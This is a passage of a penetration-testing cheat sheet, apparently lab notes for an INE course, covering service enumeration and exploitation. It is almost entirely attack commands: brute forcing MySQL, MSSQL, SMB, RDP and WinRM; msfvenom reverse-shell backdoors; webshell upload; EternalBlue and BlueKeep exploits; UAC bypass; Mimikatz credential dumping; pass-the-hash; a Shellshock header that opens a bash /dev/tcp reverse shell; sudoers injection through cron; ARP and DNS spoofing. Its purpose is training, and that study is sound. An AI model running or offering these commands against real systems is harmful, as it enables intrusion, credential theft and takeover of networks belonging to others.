arguments.\n\n```shell\nauxiliary/scanner/http/apache_userdir_enum\nauxiliary/scanner/http/brute_dirs\nauxiliary/scanner/http/dir_scanner\nauxiliary/scanner/http/dir_listing\nauxiliary/scanner/http/http_put\nauxiliary/scanner/http/files_dir\nauxiliary/scanner/http/http_login\nauxiliary/scanner/http/http_header\nauxiliary/scanner/http/http_version\nauxiliary/scanner/http/robots_txt\n```\n\n```msfconsole\nuse auxiliary/scanner/http/http_version\nshow options\nset RHOST \u003cip-address\u003e\nrun\n```\n\n\u003e This can be used to scan an Apache server.\n\n```msfconsole\nuse auxiliary/scanner/http/brute_dirs\nshow options\nset RHOST \u003cip-address\u003e\nrun\n```\n\n\u003e This can be used to find sub domains\n\n```msfconsole\nuse auxiliary/scanner/http/robots_txt\nshow options\nset RHOST \u003cip-address\u003e\nrun\n```\n\n\u003e Will show the data of `robot.txt`\n\n```Shell\ncurl http://demo.ine.local/\n```\n\n\u003e The `curl http://demo.ine.local/` command sends an HTTP GET request to the specified URL (`http://demo.ine.local/`) and returns the response from the server, which typically includes the HTML content of the webpage.\n\n```Shell\nlynx http://demo.ine.local\n```\n\n\u003e The `lynx http://demo.ine.local` command uses the Lynx web browser, a text-based browser, to access and display the content of the specified URL (`http://demo.ine.local`) in the terminal.\n\n```Shell\ndirb http://\u003cip-address\u003e /usr/share/metasploit-framework/data/wordlists/directory.txt\n```\n\n\u003e The command runs `dirb`, a web content scanner, against the specified IP address using a wordlist from Metasploit (`directory.txt`) to discover hidden directories and files on the target web server.\n\n```msfconsole\nuse exploit/windows/http/rejetto_hfs_exec \nshow options\nset RHOST \u003cip-address\u003e\nexploit\n```\n\n\u003e This module can be used to exploit rejetto http file server. \n\n```msfconsole\nuse exploit/windows/http/badblue_passthru\nshow options\nset RHOST \u003cip-address\u003e\nexploit\n```\n\n\u003e This can be used to exploit bad blue service.\n\n#### MYSQL Commands:\n\n```Shell\nmysql -h \u003cip-address\u003e -u root\n```\n\n\u003e This command can be used to connect to `mysql` through a particular user without any specific password: \n\n`show databases;`: This command is used to show data bases.\n`use \u003cname\u003e;`: This command is used to use a specific data base.\n`show tables;`: This command can be used to show the elements of Database. \n\n```sql\nSELECT * FROM table_name;\n```\n\n\u003eThis command retrieves all the data from a specific table.\n\n```msfconsole\nmsfconsole -q\nuse auxiliary/scanner/mysql/mysql_schemadump\nset RHOSTS \u003cip-address\u003e\nset USERNAME root\nset PASSWORD \"\"\nexploit\n```\n\n\u003e Dump the schema of all databases from the server using metasploit module.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_writable_dirs\nset DIR_LIST /usr/share/metasploit framework/data/wordlists/directory.txt\nset RHOSTS \u003cip-address\u003e\nset VERBOSE false\nset PASSWORD \"\"\nexploit\n```\n\n\u003e Tells if there are any writeable directories or not.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_file_enum\nset RHOSTS \u003cip-address\u003e\nset FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt\nset PASSWORD \"\"\nexploit\n```\n\n\u003e Tells about any readable files.\n\n```SQL\nselect load_file(\"/etc/shadow\");\n```\n\n\u003e This command reads the contents of the system's `/etc/shadow` file, which stores encrypted password information for Linux user accounts.\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_hashdump\nset RHOSTS \u003cip-address\u003e\nset USERNAME root\nset PASSWORD \"\"\nexploit\n```\n\n\u003e This is used to list all the users and their passwords hashes.\n\n```Shell\nnmap --script=mysql-info -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command retrieves basic information about the MySQL service running on port 3306 of the target host, including the MySQL version, protocol version, and server status.\n\n```Shell\nnmap --script=mysql-users --script-args=\"mysqluser='root',mysqlpass=''\" -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command attempts to enumerate MySQL user accounts by connecting to the MySQL service on port 3306 of the target host using the provided credentials.\n\n```Shell\nnmap --script=mysql-databases --script-args=\"mysqluser='root',mysqlpass=''\" -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command attempts to list all the MySQL databases on the target host by connecting to the MySQL service running on port 3306 using the provided credentials.\n\n```Shell\nnmap --script=mysql-variables --script-args=\"mysqluser='root',mysqlpass=''\" -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command retrieves and displays MySQL server variables and settings by connecting to the MySQL service on port 3306 of the target host using the provided credentials. These variables include configuration options, server status, and environment settings.\n\n```Shell\nnmap --script=mysql-audit --script-args \"mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'\" -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command audits the MySQL server's security settings on port 3306 of the target host by comparing them against a predefined benchmark using the provided credentials.\n\n```Shell\nnmap --script mysql-dump-hashes --script-args=\"username='root',password=''\" -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command attempts to dump MySQL password hashes from the server on port 3306 using the provided credentials (`root` with an empty password).\n\n```Shell\nnmap --script=mysql-query --script-args=\"query='select count(*) from books.authors;',username='root',password=''\" -p 3306 \u003cip-address\u003e\n```\n\n\u003e The command executes the SQL query `SELECT COUNT(*) FROM books.authors;` on the MySQL server at `demo.ine.local` using the provided credentials (`root` with an empty password).\n\n```msfconsole\nuse auxiliary/scanner/mysql/mysql_login\nset RHOSTS \u003cip-address\u003e\nset USERNAME root\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nset VERBOSE false\nset STOP_ON_SUCCESS true\nexploit\n```\n\n\u003e Password brute forcing using metasploit\n\n```Shell\nhydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt \u003cip-address\u003e mysql\n```\n\n\u003e Brute force using hydra.\n\n```Shell\nnmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 \u003cip-address\u003e\n```\n\n\u003e The command retrieves NTLM authentication information from the Microsoft SQL Server instance running on port 1433 of the target IP.\n\n```Shell\nnmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Deskt p/wordlist/100-common-p asswords.txt \u003cip-address\u003e\n```\n\n\u003e Brute Force using NMAP.\\\n\n```Shell\nnmap -p 1433 --script ms-sql-empty-password \u003cip-address\u003e\n```\n\n\u003e Login through empty password.\n\n```Shell\nnmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query=\"SELECT * FROM master..syslogins\" \u003cip-address\u003e -oN output.txt gvim output.txt\n```\n\n\u003e The command runs a SQL query (`SELECT * FROM master..syslogins`) on the Microsoft SQL Server instance using the `admin` credentials with password `anamaria`, saves the output to `output.txt`, and then opens this file in `gvim`.\n\n```Shell\nnmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria \u003cip-address\u003e\n```\n\n\u003e The command retrieves password hashes from the Microsoft SQL Server using the provided `admin` credentials with password `anamaria`.\n\n```Shell\nnmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd=\"ipconfig\" \u003cip-address\u003e\n```\n\n\u003e The command executes the `ipconfig` command on the Microsoft SQL Server at `\u003cip-address\u003e` using the `admin` credentials with password `anamaria` and the `xp_cmdshell` stored procedure.\n\n```Shell\nnmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd=\"type c:\\flag.txt\" \u003cip-address\u003e\n```\n\n\u003e The command runs `type c:\\flag.txt` on the Microsoft SQL Server at using the `admin` credentials with password `anamaria`, which attempts to read and display the contents of `c:\\flag.txt` via the `xp_cmdshell` procedure.\n\n```msfconsole\nuse auxiliary/scanner/mssql/mssql_login \nset RHOSTS \u003cip-address\u003e \nset USER_FILE /root/Desktop/wordlist/common_users.txt \nset PASS_FILE /root/Desktop/wordlist/100-common-passwords.txt \nset VERBOSE false exploit\n```\n\n\u003e MSSQL brute force using metasploit.\n\n```msfconsole\nuse auxiliary/admin/mssql/mssql_enum \nset RHOSTS \u003cip-address\u003e\nexploit\n```\n\n\u003e Running MSSQL enumeration module to find all possible information.\n\n```msfconsole\nuse auxiliary/admin/mssql/mssql_enum_sql_logins \nset RHOSTS \u003cip-address\u003e \nexploit\n```\n\n\u003e Extract all MSSQL users.\n\n```msfconsole\nuse auxiliary/admin/mssql/mssql_exec \nset RHOSTS \u003cip-address\u003e\nset CMD whoami \nexploit\n```\n\n\u003e Execute a command using `mssql_exec` module.\n\n```msfconsole\nuse auxiliary/admin/mssql/mssql_enum_domain_accounts \nset RHOSTS \u003cip-address\u003e \nexploit\n```\n\n\u003e This module dumps the information such as Windows domain users, groups, and computer accounts\n\n#### Exploiting Microsoft IIA WebDAV:\n\n```shell\nnmap --script http-enum -sV -p 80 demo.ine.local\n```\n\u003e check the webdev\n```Shell\nhydra -L /usr/share/metasploit/common_user.txt -P /usr/share/metasploit/common_passwords.txt \u003cip-address\u003e http-get /webdav/\n```\n\n\u003e Hydra can be used to brute force `webdav` directory if the authentication is enabled.\n\n```Shell\ndavtest -url http://\u003cip-address\u003e/webdav\n```\n\n\u003e Can be used to test if `webdav` is present or is accessible without authentication. If it isn't then it will show an error.\n\n```Shell\ndavtest -auth \u003cuser-name\u003e:\u003cpassword\u003e -url http://\u003cip-address\u003e/webdav\n```\n\n\u003e This will perform a check and will tell what type of files can be uploaded or executed over the server.\n\n```\ncadaver http://\u003cip-address\u003e/webdav\n```\n\n\u003e Cadaver can be used to upload files on the server and when you will type this command you will be than asked for a username and a password. After the correct creds. you will get the access to a pseudo shell through which you will be able to interact with the server. \n\n```Shell\nput /usr/share/webshells/asp/webshell.asp\n```\n\n\u003e This command can be used in the pseudo shell to upload the web shell on to the server.\n\n```Shell\n/usr/share/webshells\n```\n\n\u003e This directory has different web shells with in Kali Linux.\n\n```Shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=\u003clocal_ip\u003e LPORT=1234 -f asp \u003e \u003coutput-file-name\u003e.asp\n```\n\n\u003e `msfvenom` command to generate a `.asp` shell code.\n\n```msfconsole\nuse multi/handler\nset payload windows/meterpreter/reverse_tcp\nshow options\nset LHOTS \u003clocal_ip\u003e\nset LPORT 1234\nexploit\n```\n\n\u003e Msfconsole listener setup.\n\n```msfconsole\nuse exploit/windows/iis/iis_webdav_upload_asp\nshow options\nset HttpUsername \u003cusername\u003e\nset HttpPassword \u003cpassword\u003e\nset RHOST \u003cip-address\u003e\nset PATH /webdav/metasploit.asp\nexploit\n```\n\n\u003e This can be used to automate the whole process of uploading and exploitation.\n\n#### SMB Exploitation:\n\n```msfconsole\nuse auxiliary/scanner/smb/smb_login\nshow options\nset RHOST \u003cip-address\u003e\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nset VERBOSE false\nexploit\n```\n\n\u003e This module can be used to brute force users on SMB.\n\n```\npsexec.py Administrator@\u003cip-address\u003e cmd.exe\n```\n\n\u003e It will ask for the password after this command.\n\n```msfconsole\nuse exploit/windows/smb/psexec\nshow options\nset RHOST \u003cip-address\u003e\nset SMBUser \u003cusername\u003e\nset SMBPass \u003cpassword\u003e\nexploit\n```\n\n\u003e If you know the user and pass then it will automates the uploading and exploitation phase and gives you a meterpreter shell.\n\n#### Exploiting MS17-010\n\n```Shell\nnmap -sV -p 445 --script=smb-vuln-ms17-010 \u003cip-address\u003e\n```\n\n\u003e Scans the machine for MS17-010 Vulnerability. \n\n```Shell\ngit clone https://github.com/3ndG4me/AutoBlue-MS17-010\n```\n\n\u003e This tool can be used to exploit the vulnerability manually. \n\n```msfconsole\nuse exploit/windows/smb/ms17_010_eternalblue\nshow options\nset LHOST \u003chost-address\u003e\nset RHOST \u003cip-address\u003e\nexploit\n```\n\n#### RDP Exploitation:\n\n```msfconsole\nsearch auxiliary/scanner/rdp/rdp_scanner\nshow options\nset RHOST \u003cip-address\u003e\nset RPORT \u003cport-number\u003e\nrun\n```\n\n\u003e This will tell whether a specific port is running RDP or not.\n\n```Shell\nhydra -L /usr/share/metasploit/common_user.txt -P /usr/share/metasploit/unix_passwords.txt rdp://\u003cip-address\u003e -s 3333\n```\n\n\u003e Command to brute force RDP.\n\n```Shell\nxfreerdp /u:administrator /p:\u003cpassword\u003e /v:\u003cip-address\u003e:3333\n```\n\n\u003e Command can be used to connect to RDP.\n\n#### Exploit Blue Keep:\n\n```msfconsole\nuse auxiliara/scanner/rdp/cve_2019_0708_bluekeep\nshow options\nset RHOST \u003cip-address\u003e\nrun\n```\n\n\u003e It is a Blue Keep Vulnerability scanner.\n\n```msfconsole\nuse exploit/windows/rdp/cve_2019_0708_bluekeep_rce\nshow options\nset RHOST \u003cip-address\u003e\nshow target \nset target \u003ctarget-number\u003e\nexploit\n```\n\n\u003e Module can be used to exploit the vulnerability and then get access.\n\n#### Exploit Bad Blue\n\n```shell\nuse exploit/windows/http/badblue_passthru\nset RHOSTS \u003clocal-IP\u003e\nset target BadBlue\\ EE\\ 2.7\\ Universal\nrun\n```\n\n#### Exploiting WinRM:\n\n```Shell\ncrackmapexec winrm \u003cip-address\u003e -u administrator -p /usr/share/metasploit/unix_passwords.txt\n```\n\n\u003e WinRM brute force command using `crackmapexec`.\n\n```Shell\ncrackmapexec winrm \u003cip-address\u003e -u administrator -p \u003cpassword\u003e -x \"\u003cany command\u003e\"\n```\n\n\u003e This command can be used to execute arbitrary command on the windows machine.\n\n```Shell\neveil-winrm.rb -u administrator -p '\u003cpassword\u003e' -i \u003cip-address\u003e\n```\n\n\u003e This will automatically provide us a command shell session.\n\n```msfconsole\nuse exploit/windows/winrm/winrm_script_exec\nshow options\nset RHOST \u003cip-address\u003e\nset FORCE_VBS true\nset USERNAME administrator\nset PASSWORD \u003cpassword\u003e\nexploit\n```\n\n\u003e This will provide us with a shell session as well.\n\n```msfconsole\nuse auxiliary/scanner/winrm/winrm_login\nset RHOSTS demo.ine.local\nset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt\nset VERBOSE false\nset PASSWORD anything\nexploit\n```\n\n\u003e Can be used to brute force the creds.\n\n```msfconsole\nuse auxiliary/scanner/winrm/winrm_auth_methods\nset RHOSTS demo.ine.local\nexploit\n```\n\n\u003e Checking WinRM supported authentication method using an auxiliary module.\n\n```msfconsole\nuse auxiliary/scanner/winrm/winrm_cmd\nset RHOSTS demo.ine.local\nset USERNAME administrator\nset PASSWORD tinkerbell\nset CMD whoami\nexploit\n```\n\n\u003e Can be used to execute remote commands.\n\n#### Windows Kernel Exploits:\n\n**Note:**\n\n\u003e Everything demonstrated here after is basically done after the initial foothold.\n\nThis is a built in meterpreter command i.e. `getsystem` that uses some techniques to escalate the privileges. It can used in some cases as well. \n\n```msfconsole\nuse post/multi/recon/local_exploit_suggester\nshow options\nset SESSION \u003csession-ID\u003e\nrun\n```\n\n\u003e It will tell the exploit modules that you can try to elevate your privileges.\n\n```msfconsole\nuse exploit/windows/local/ms16_014_wmi_recv_notif\nshow options\nset SESSION \u003csession-ID\u003e\nset LPORT \u003cport-number\u003e\nexploit\n```\n\n\u003e It can be used to escalate privileges in vulnerable windows 7 machine.\n\n```Shell\ngit clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester\n```\n\n\u003e This tool compares a target path levels with Microsoft vulnerability database in order to detect missing patches on the target that can be then exploited.\n\n**How to use:**\n\nFirst get the system info from the meterpreter session by `shell \u003e systeminfo`. Then copy this info in a text file and then pass this as an argument to the tool.\n\n**Step 01:**\n\n```Shell\n$ ./windows-exploit-suggester.py --update\n[*] initiating...\n[*] successfully requested base url\n[*] scraped ms download url\n[+] writing to file 2014-06-06-mssb.xlsx\n[*] done\n```\n\n**Step 02:**\n\n```Shell\ninstall python-xlrd, $ pip install xlrd --upgrade\n```\n\n**Step 03:**\n\n```Shell\n./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt\n```\n\n#### Bypassing UAC with UACMe:\n\n***UAC STANDS FOR USER ACCOUNT CONTROL***\n\n```shell\nuse exploit/windows/http/rejetto_hfs_exec\n```\n\u003e for session\n\n```meterpreter\npgrep explorer\nmigrate \u003cprocess-ID\u003e\ngetuid\nshell\nnet user\nnet localgroup administrators\nget privs\n```\n\n\u003e This command can be used to switch to the 64 Bit meterpreter session.\n\n```Shell\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.31.2 LPORT=4444 -f exe \u003e 'backdoor.exe'\n```\n\n\u003e Generating malicious executable using msfvenom.\n\n```shell\nmsfconsole\nuse multi/handler\nset payload windows/meterpreter/reverse_tcp\nset LHOST \u003cmy-IP\u003e\nset LRORT 1234\n```\nAfter create session\n\n```shell\ncd C://\nmkdir Temp\ncd Temp\nupload backdoor.exe\nupload /root/Desktop/tools/UACME/Akagi64.exe\nshell\n.\\Akagi64.exe 23 C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.exe\n```\n\n```console\n/root/Desktop/tools/UACME/Akagi64.exe\n```\n\n\n\u003e Location of the `Akagi` exploit that is used to bypass UAC.\n\n```Shell\nAkagi64.exe 23 C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.exe\n```\n\n\u003e `Akagi` command is used to run the exploit by bypassing the UAC.\n\n```CMD\nps -S lsass.exe\nmigrate \u003cprocess-ID\u003e\n```\n\n\u003e After the exploitation and meterpreter session migrate to the `lsass.exe` process.\n\n#### Access Token Impersonation:\n\n**Note:**\n\n\u003e Everything demonstrated here after is basically done after the initial foothold.\n\n***YOU HAVE TO PERFROM THE FOLLOWING FUNCTION IN THE METERPRETER SESSION. YOU CAN TO FOLLOWING IF AND ONLT IF YOU HAVE THE `SeImpersonationPrivilages` IN THE `getprivs` SECTION***\n\n```msfconsole\nload incognito\nlist_tokens -u\nimpersonate_token \"\u003cgroup-name\u003e\\Administrator\"\ngetuid\npgrep explorer\nmigrate \u003cprocess-id\u003e\n```\n\n***IF YOU DONT FIND ANY PRIVILAGED TOKENS IN BOTH DELEGATION TOKENS AND IMPERSONANTION TOKENS THAN YOU HAVE TO USE THE POTATO ATTACK***\n\n#### Searching for Passwords In Windows Configuration Files:\n\n***YOU NEED ELIVATED PRIVILEGES TO DUMP HASHES***\n\n```Shell\nC:\\\\Windows\\Panther\\Unattend.xml \u003e\u003e in base64\nC:\\\\Windows\\Panther\\Autounattend.xml\n```\n\n\u003e These are the configuration files that contain the user accounts and their passwords along side system configuration. In unattend the passwords are stored in base64.\n\n#### Dumping hashes with Mimikatz:\n\n**Note:**\n\n\u003e Everything demonstrated here after is basically done after the initial foothold.\n\n\n```msfconsole\nmigrate -N lsass.exe\nload kiwi\n?\ncreds_all\nlsa_dump_sam\nlsa_dump_secrets\n```\n\n\u003e Dumping passwords hashes using `kiwi`.\n\n```msfconsole\nupload usr/share/windows-resources/mimikatz/mimikatz.exe\nshell\ndir\nmimikatz.exe\nprivilege::debug\nlsadump::sam\nlsadump::secrets\nsekurlsa::logonpasswords\n```\n\n\u003e Command can be used to upload the `mimikatz.exe` file and then run it in the windows shell.\n\n#### Pass-The-Hash:\n\n**Note:**\n\n\u003e Everything demonstrated here after is basically done after the initial foothold and after getting the hashes from the kiwi module. Make sure to make a file to store all the hashes in it.\n\n\n```msfconsole\nuse exploit/windows/smb/psexec\nshow options\nset LPORT \u003csome-new-port\u003e\nset RHOST \u003cip-address\u003e\nset SMBUser Administrator \u003cany-other-user-can-be-used\u003e\nset SMBPass \u003cNTLM-HASH:LM-HASH\u003e\nset target Native\\ upload\nexploit\n```\n\n\u003e Via these commands if everything goes smoothly you'll have a successful pass-the-hash attack.\n\n```Shell\ncrackmapexec smb \u003cip-address\u003e -u Administrator -H \"\u003cNTLM-HASH\u003e\" -x \"any-command\"\n```\n\n\u003e Pass-the-hash attack using `crackmapexec`.\n\n```Shell\nruby evil-winrm.rb -i 10.0.0.20 -u user -H \u003cNTLM-HASH\u003e\n```\n\n\u003e `evil-winrm.rb` tool can be used to perform the same function.\n\n#### Linux Exploitation:\n\n#### Shell Shock:\n\n```Shell\nnmap -sV \u003cip-address\u003e --script=http-shellshock --sctipt-args \"http-shellshock.uri=/gettime.cgi\"\n```\n\n\u003e A shell shock vulnerability script. you must have apache services\n\n***TO EXPLOIT IT VIA BRUP SUITE WE HAVE TO PASS COMMANDS IN THE  USER AGENT HEADER AS SHOWN BELOW***\n\n\u003e First send it to the repeater and then change the header in the repeater tab. \n\n```HTTP\nUser Agent: () { :; }; echo; echo; /bin/bash -c '\u003ccommand\u003e'\nUser Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd' \n```\n\n***FOLLOWING IS THE METHOD TO GAIN A REVERSE SHELL FROM BURP SUITE***\n\n```Shell\nnc -nvlp 1234\n```\n\n\u003e First turn on the net cat on listening mod on port 1234.\n\n```http\nUser Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i\u003e\u0026/dev/tcp/\u003chost-ip-addresss\u003e/1234 0\u003e\u00261'\nUser Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i\u003e\u0026/dev/tcp/192.24.241.2/1234 0\u003e\u00261'\n```\n\n\u003e This header upon running will give a reverse shell on the system.\n\n```msfconsole\nuse exploit/multi/http/apache_mod_cgi_bach_env_exec\nshow options\nset RHOST \u003cip-address\u003e\nset TARGETURI /gettime.cgi\nexploit\n```\n\n\u003e Module for exploitation the shellshock vulnerability. \n\n#### WMAP\n```shell\nwmap_sites -h\n```\n\u003e to see the options\n\n```shell\nservice postgresql start\nmsfconsole\nload wmap\nwmap_sites -a http://\u003cip-target\u003e\nwmap_targets -t http://\u003cip-target\u003e\nwmap_sites -l\nwmap_run -h\nwmap_run -t\nwmap_run -e\nwmap_vuln -l (show the list of all vulnerability)\n```\n\u003e it is web application vulnerabilty scanner\n\n#### SAMBA Commands:\n\n```Shell\nhydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt \u003cip-address\u003e smb\n```\n\n\u003e Brute force samba command.\n\n```Shell\nsmbmap -H \u003cip-address\u003e -u \u003cuser-name\u003e -p password1\n```\n\n\u003e List downs all the shares of the given user.\n\n```Shell\nsmbclient //\u003cip-address\u003e/\u003cshare-name\u003e -U admin \n```\n\n\u003e This command be used to connect to a particular share.\n\n```Shell\nenum4linux -a \u003cip-address\u003e\n```\n\n\u003e Basic target information.\n\n```Shell\nenum4linux -a -u \u003cuser-name\u003e -p \u003cpassword\u003e \u003cip-address\u003e\n```\n\n\u003e For a particular user.\n\n#### Linux Kernel Exploits:\n\n**Note:**\n\n\u003e Everything demonstrated here after is basically done after the initial foothold.\n\n```meterpreter\nupload les.sh\nshell\n/bin/bash -i\nchmod +x les.sh\n./les.sh\n```\n\n\u003e This script works as the exploit suggester for linux.\n\n```console\nhttps://www.exploit-db.com/exploits/40839\n```\n\n\u003e This link has the exploit for the dirty cow vulnerability.\n\n```Shell\ngcc -pthread \u003cexploit-file-name\u003e.c -o dirty -lcrypt\nchmod +x dirty\n```\n\n\u003e This forms the executable of the given file by the name `dirty`. After this upload the file on the machine using the meterpreter session.\n\n***IF IT ISN'T WORKING YOU CAN THEN UPLOAD THE C FILE DIRECTLY ON TO THE MACHINE AND THEN RUN THESE COMMADS THERE TO FORM AND EXECUTABLE***\n\n\u003e After the script has ran successfully it will create a user by the name `firefart` that would have the root privileges.\n\n#### Cron Jobs\n\n\u003e We will be targeting Cron Jobs that have been created by the `root` user in order to escalate our privileges.\n\n```Shell\ncrontab -l\n```\n\n\u003e The command to display the list of scheduled cron jobs for the current user is\n\n```Shell\ngrep -nri “/tmp/message” /usr\n```\n\n\u003e The command is used to search for the string `\"/tmp/message\"` within files located under the `/usr` directory.\n\n```Shell\nprintf '#! /bin/bash\\necho \"student ALL=NOPASSWD:ALL\" \u003e\u003e /etc/sudoers' \u003e /usr/local/share/copy.sh\n```\n\n\u003e Exploiting the cron jobs misconfiguration.\n\n#### Exploiting SUID Binaries:\n\n***SET OWNER USER ID***\n\n```Shell\n| -rwsr-xr-x | 1 | root  |  8344 | Sep 222  |  2018 | welcome\n```\n\n\u003e Now here the `s` in the permissions section is the `SUID` permission. So that means it is being executed by the root privileges. \n\n```Shell\nrm \u003cfile-name\u003e\ncp /bin/bash \u003cfile-name\u003e\n```\n\n\u003e Now if we remove a file that is being run by the welcome file as shown above and make a file with the same name but with the components of `/bin/bash`. Then upon executing the `welcome` file we will get the root privileges.\n\n#### Dumping Linux Passwords Hashes:\n\n```console\n/etc/shadow\n```\n\n\u003e This file has all the hashes for the user that are using that particular machine and this can only be accessed by a root user or a user with privileged access.\n\n```console\nroot:$6$gvewkfv7o7i32ugbc328pgibcewuhjbh:45678:0:999999:7:::\n```\n\n\u003e This is an exemplary hash \n\n```msfconsole\nuse post/linux/hashdump\nshow options \nset SESSION \u003csession-ID\u003e\nrun\n```\n\n\u003e This modules will also perform the same function\n\n```msfconsole\nuse auxiliary/analyze/crack_linux\nset SHA512 true\nrun\n```\n\n\u003e This module can be used to crack a hash.\n\n#### SMB \u0026 NetBIOS Enumeration:\n\n```shell\nnmap -p445 --script smb-enum-users.nse  demo.ine.local\n```\n\n\u003e see the user and than make a users.txt file\n\n```Shell\nhydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb\n```\n\u003e Hydra command to brute force `smb` users pass.\n\n```msfconsole\nmsfconsole -q\nuse exploit/windows/smb/psexec\nset RHOSTS demo.ine.local\nset SMBUser administrator\nset SMBPass password1\nexploit\n```\n\n\u003e This module can be used to exploit the machine using `smb` creds.\n\n\n\n```cmd\nrun autoroute -s 10.0.22.69/20\n```\n\n\u003e This command is related to managing and utilizing routes within a compromised network during a penetration test. By running `autoroute -s 10.0.22.69/20`, you are instructing Metasploit to add a route to the network `10.0.16.0/20` via the compromised machine.\n\n```shell\ncat /etc/proxychains4.conf\n```\n\n\u003e Socks proxy configuration is in this file.\n\n***result***\n```shell\n# defaults set to \"tor\"\nsocks4  127.0.0.1 9050\n```\n\n```msfconsole\nuse auxiliary/server/socks_proxy\nshow options\nset SRVPORT 9050\nset VERSION 4a \nexploit\njobs\n```\n\n\u003e This module can be used to set up `socks4a` proxy chain.\n\n```Shell\nproxychains \u003ccommand\u003e\nproxychains nmap demo1.ine.local -sT -Pn -sV -p 445\n```\n\n\u003e This is how you can run commands to other machine using `proxychains` from `metasploit`.\n\n```CMD\nmigrate -N explorer.exe (meterpreter)\nshell\nnet view 10.0.22.69 \n```\n\n\u003e This lists down all the shared resources (if any) between two machines on a network.\n\n```cmd\nnet use D: \\\\10.0.22.69\\Documents\nnet use K: \\\\10.0.22.69\\K$\ndir D:\ndir K:\n```\n\n\u003e Command to load and access the shared resources.\n\n\n#### SNMP Enumeration:\n\n```Shell\nnmap -sU -p 161 \u003cip-address\u003e\n```\n\n\u003e We must keep in mind that **nmap** does not check for **UDP** ports by default. As we already know, **SNMP** runs on the **UDP** port **161**. So we have to run a special specific scan.\n\n```Shell\nnmap -sU -p 161 --script=snmp-brute \u003cip-address\u003e\n```\n\n\u003e  nmap `snmp-brute` script can be used to find the community string. The script uses the `snmpcommunities.lst` list for brute-forcing it is located inside `/usr/share/nmap/nselib/data/snmpcommunities.lst` directory.\n\n```Shell\nsnmpwalk -v 1 -c public demo.ine.local\n```\n\n\u003e `snmpwalk` tool can be used to find all the information via SNMP.\n\n`-v`: Specifies SNMP version to use.\n`-c`: Set the community string.\n\n```Shell\nnmap -sU -p 161 --script snmp-* demo.ine.local \u003e snmp_output\n```\n\n\u003e The above command would run all the nmap SNMP scripts on the target machine and store its output to the`snmp_output`file.\n\n```Shell\nhydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb\n```\n\n\u003e After this `psexec` can be used to exploit the machine.\n\n#### SMB Relay Attack:\n\n```msfconsole\nuse exploit/windows/smb/smb_relay\nshow options\nset LHOST \u003cour-ip-address\u003e\nset SRVHOST \u003cour-ip-address\u003e\nset SMBHOST \u003ctarget-ip-address\u003e\nexploit\njobs\n```\n\n\u003e This will start the server up for the relay attack.\n\n```Shell\necho \"\u003cour-ip-address\u003e *.sportsfoo.com\" \u003e dns\n```\n\n\u003e By this command we have created a fake kind of `DNS` file that can be used to spoof the DNS then.\n\n```Shell\ndnsspoof -i eth1 -f dns\n```\n\n\u003e The command  uses the `dnsspoof` tool to intercept and spoof DNS queries on the network interface `eth1`, using the DNS in the `dns` file that we just created. This is used to attract all the traffic towards the attacker machine.\n\n```Shell\necho 1 \u003e /proc/sys/net/ipv4/ip_forward\n```\n\n\u003e This command can be used to enable ip-forwarding. in seperate terminal\n\n```Shell\narpspoof -i eth1 -t 172.16.5.5 172.16.5.1\narpspoof -i eth1 -t 172.16.5.1 172.16.5.5\n```\n***Windows 7 at 172.16.5.5, and the default gateway at 172.16.5.1***\n\u003e The attacker positions themselves in the middle of the communication between `172.16.5.5` and `172.16.5.1`, enabling a Man-in-the-Middle (MitM) attack. both run in seperate terminal.\n\n***EXPLAINATION:***\n\nThe commands use `arpspoof` to perform ARP spoofing, tricking the devices at IP addresses `172.16.5.5` and `172.16.5.1` into thinking the attacker's MAC address belongs to each other. This redirects the network traffic between these two devices through the attacker, enabling a Man-in-the-Middle (MitM) attack.\n\n#### Importing Nmap Scan Results Into MSF\n\n\u003e Following set of commands can be used to import a scan into your `msfconsole`\n\n```msfconsole\nnmap -sV -Pn -oX my-scan.xml \u003cip-address\u003e\nservice postgresql start\nmsfconsole -q\ndb_status\ndb_import my-scan.xml\nhosts\nservices\n```\n\n#### Network Service Scanning\n\n***THIS IS DONE VIA PIVOTING AND EVERYTHING 